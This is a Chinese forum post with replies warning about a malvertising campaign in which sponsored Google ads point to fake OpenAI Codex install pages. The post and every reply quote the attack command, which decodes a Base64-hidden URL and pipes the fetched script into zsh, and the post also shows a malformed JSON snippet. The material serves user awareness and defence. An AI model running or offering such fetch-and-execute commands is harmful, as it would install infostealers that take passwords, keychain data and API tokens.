识别谷歌搜索广告中利用 Base64 编码伪装的恶意脚本攻击

脚本小子阿强 初级 2026/8/18 734 浏览 0 点赞 约 1 分钟

若在安装 AI 工具时发现命令包含 base64 -d 解码操作、使用 curl 配合管道符传递给 zsh 或 sh,且 URL 并非官方域名,此时直接执行将导致远程脚本在高权限环境下运行。此时应先将脚本下载至本地,利用编辑器分析逻辑后再决定是否执行。

这种攻击通过谷歌搜索的赞助商广告传播,部分链接伪装成官方工具。以搜索 OpenAI Codex 为例,排名首位的广告会引导用户进入虚假安装页。其运行的命令如下:

echo "npm install -g u/openai/codex https://openai.com/codex/" && curl -s $(echo "<base64 encoded URL>" | openssl base64 -d -A) | zsh

该指令利用 && 符号,在 echo 模拟 npm 安装文字输出后,通过 openssl base64 -d -A 解码隐藏的恶意地址,由 curl -s 下载并交给 zsh 执行。由于脚本执行后会迅速消失,传统监控工具难以察觉。

此类 Infostealer 攻击目标是 Chrome 浏览器密码、macOS Keychain 密钥及环境变量中的 API Token。这些敏感数据被上传至外部服务器后,脚本会自毁。针对二进制文件,可通过验证签名确认安全性,官方文件带有 Developer ID Application: OpenAI OpCo, LLC 签名。

在分析此类恶意数据时,可能会遇到类似 { "serial" : 13 , "lineage" : "d431ee-3da9-4407-b649-b0d2c0ca2d67" , "meta" : { "key_provider" ]" , "encryption_version" : "v0" } 的 Base64 编码 JSON 文件。这类文件通过密码派生密钥进行加密,内容表现为难以解读的长字符串。

GoogleOpenAI CodexzshInfostealer

全部回复 (3)

想当场把话说完?进全球 AI 聊天室,登录就能开口。

小
小柯爱学习 专家 2026/8/18

赶紧把所有环境变量翻一遍,万一混进一段 Base64 脚本,像 curl -s $(echo "<base64 encoded URL>" | openssl base64 -d -A) | zsh 这样的命令真的能把电脑搞瘫痪——攻击者会故意在 echo "npm install -g u/openai/codex && curl ..." 里先打印一段假的安装提示,让你以为正在执行正常安装,实际上真正的恶意载荷藏在 && 后面,远程脚本一下载就直接喂给 zsh 执行,瞬间扫描你的 Chrome 密码、Cookies、macOS Keychain 还有环境变量里的 API Token,干完就自毁,连 LaunchAgents 和 .zshrc 都查不到痕迹。

0 回复
小
小Kevin在路上 中级 2026/8/18

差点就粘贴了,Base64 这种隐蔽方式太阴了,心脏差点停跳,比如这段代码中的 echo "npm install -g u/openai/codex && curl -s $(echo "<base64 encoded URL>" | openssl base64 -d -A) | zsh" 就利用 Base64 编码掩盖了恶意链接。

0 回复
早
早八人AI炼丹师 专家 2026/8/18

差点被坑死,没想到 Base64 编码的恶意链接居然藏在看似正规的谷歌广告位里——比如搜索 OpenAI Codex 时,第一个 Sponsored 链接就可能指向一个伪造的 Google Pages 安装页面。那里的命令看起来专业规范,但实际前半部分的 echo 只是打印假 npm 安装信息,真正的攻击载荷藏在 && 后面,通过 openssl base64 -d -A 解码后直接执行远程脚本。这种手法利用了用户对管道符 | 和 Base64 的信任,让你在以为安装工具时,实际上已经在最高权限下运行了盗取密码的脚本。

关键在于:遇到任何带有 curl ... | zsh 或 base64 -d 的命令,绝对不能直接粘贴执行——先保存到本地,用编辑器检查代码逻辑,确认无误再运行。官方安装脚本几乎不会用这种隐藏路径的方式,尤其是涉及 Base64 解码时。

0 回复

发表回复

支持 Markdown 格式